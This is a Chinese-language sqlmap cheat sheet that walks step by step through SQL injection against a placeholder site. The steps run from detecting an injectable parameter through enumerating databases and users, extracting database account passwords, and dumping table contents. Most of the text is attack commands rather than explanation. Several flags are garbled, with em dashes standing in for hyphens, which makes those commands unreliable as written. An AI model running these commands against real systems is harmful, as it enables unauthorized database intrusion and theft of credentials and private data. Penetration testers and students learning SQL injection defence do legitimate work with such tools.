基础
1:检测注入点是否可用?
python sqlmap.py -u “http://www.target.com/example.asp?id=1”
1.1检测结果
1.1.1注入type:
boolean-based blind
error-based
inline query
stacked queries
and/or time-based blind
union query
1.1.2配置信息
web服务器信息
web应用程序技术
数据库类型
1.2让程序自动输入若干询问语句
python sqlmap.py -u“http://www.target.com/example.asp?id=1” --batch
2:爆库
爆出其中所有数据库的名字
python sqlmap.py -u“http://www.target.com/example.asp?id=1” --dbs
3:web当前使用的数据库
python sqlmap.py -u“http://www.target.com/example.asp?id=1” —-current-db
4:列出数据库所有用户
python sqlmap.py -u“http://www.target.com/example.asp?id=1” —-users
5:web数据库使用账户
python sqlmap.py -u“http://www.target.com/example.asp?id=1” —-current-user
6:数据库账户和密码
python sqlmap.py -u“http://www.target.com/example.asp?id=1” --passwords
7:列出数据库中的表
python sqlmap.py -u“http://www.target.com/example.asp?id=1” —D 数据库名字 —-tables
8:列出表中的字段
python sqlmap.py -u“http://www.target.com/example.asp?id=1” —D 数据库名字 -T 表的名字—-columns
9:爆字段内容
python sqlmap.py -u“http://www.target.com/example.asp?id=1” —D 数据库名字 -T 表的名字 —C 要爆的字段 (—-start 1 —-stop 10 )—-dump/制定开始的行和结束的行/将结果导出